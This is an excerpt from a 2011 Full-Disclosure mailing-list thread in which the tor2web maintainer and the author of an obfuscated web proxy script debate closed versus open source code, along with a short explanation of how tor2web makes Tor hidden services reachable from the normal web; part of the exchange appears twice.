So protected source code has it's advantages/disadvantages.


 If you decide to release the source code of your software publicly I
 will take it into consideration as a possible replacement for the
 current tor2web code. However I will *never* use software whose code I
 am unable to read.


This means you are not using windows nor any other commercial software
because they don't release source code?


 Thanks for the interest in the tor2web project.


 - Art.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Tor2web 2.0 is live!

2011-08-22 Thread nix

 Im involved in anonymity and privacy research and development. I've
 recently released NiX Web Proxy Script:
 http://myproxylists.com/proxy-script

 A fully working online demo: http://myproxylists.com/nix_web_proxy/

 PS. Does tor2web require custom modification before you can use a
 spesific
 web proxy software with the project? Im still trying to understand
 what's
 the point in tor2web :)


 Cool!

 First thing let me clarify what the goal of tor2web is. Tor Hidden
 Services are usually only accessible through a Tor enabled browser, what
 tor2web does allow people to visit hidden services from the normal web.

 It does not claim to guarantee any sort of anonymity on the client side
 (this can be achieved by using Tor) but only allow people publishing
 content anonymously with Tor hidden service
 (https://www.torproject.org/docs/hidden-services.html.en) to be reached
 from the normal web.

 I have taken a brief look at your software although I do not like the
 fact that you are obfuscating your code. For a software that claims
 security to be their top priority, hiding code is a very bad practice.


I understand your point but it's always harder to find bugs when you have
no source code.

It's obfuscated because NiX don't have a name yet. If it will become a
brand, I'll have no issues to release the source code.

The software contains very unique parsing engine and other advanced logics
which im not up to publishing to the public unless the above condition has
met. There's no backdoors whatsoever and it does not steal any personal
information. Protected source code also prevents others from using the
software for malicious purposes. We neither will see that easily renamed
derivate work.

So protected source code has it's advantages/disadvantages.


 If you decide to release the source code of your software publicly I
 will take it into consideration as a possible replacement for the
 current tor2web code. However I will *never* use software whose code I
 am unable to read.


This means you are not using windows nor any other commercial software
because they don't release source code?


 Thanks for the interest in the tor2web project.


 - Art.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/